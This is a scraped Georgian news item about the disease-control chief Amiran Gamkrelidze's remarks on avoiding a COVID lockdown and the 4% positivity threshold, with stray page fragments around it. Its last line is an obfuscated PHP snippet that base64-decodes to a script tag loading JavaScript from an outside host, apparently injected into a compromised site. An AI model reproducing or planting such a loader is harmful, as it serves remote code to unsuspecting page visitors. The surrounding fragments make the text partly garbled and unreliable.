celsiusi
ავერსი საქკაბელი
"ყველა ვცდილობთ, რომ მძიმე "ლოქდაუნი" ქვეყანაში აღარ იყოს, რადგან ეს ძალიან მძიმე იქნება როგორც მოქალაქეებისთვის, ისე ქვეყნის ეკონომიკისთვის", - ამის შესახებ დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელმა ამირან გამყრელიძემ განაცხადა.
 
ის გამოეხმაურა ჯანდაცვის მინისტრის მოადგილე ეკატერინე ტიკარაძის განცხადებას, რომელმაც თქვა, რომ 4%-იანი დადებითობის მაჩვენებლის შემთხვევაში, მთავრობა "ლოქდაუნზე" დაიწყებს მსჯელობას.
 
გამყრელიძე განმარტავს, რომ "ლოქდაუნის" გამოცხადება კლინიკებში არსებულ მდგომარეობაზეც არის დამოკიდებული. 
 
„რეკომენდაციები უნდა დავიცვათ. დადებითობის 4%-იანი მაჩვენებელი ზღვარად გვქონდა, როცა ზემოდან ქვემოთ მოდიოდა მაჩვენებლები ანუ ვამსუბუქებდით შეზღუდვებს. მარტო ერთი დადებითობის მაჩვენებლით ვერ იმსჯელებ შეზღუდვებზე, აქ გათვალისწინებული იქნება მდგომარეობა, თუ როგორი იქნება საწოლების დატვირთულობა, რესპირატორების დატვირთვა და ა.შ. სწორედ ამის მიხედვით მსჯელობს საკოორდინაციო საბჭო ამ საკითხებზე“, - განაცხადა ამირან გამყრელიძემ.
1208
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");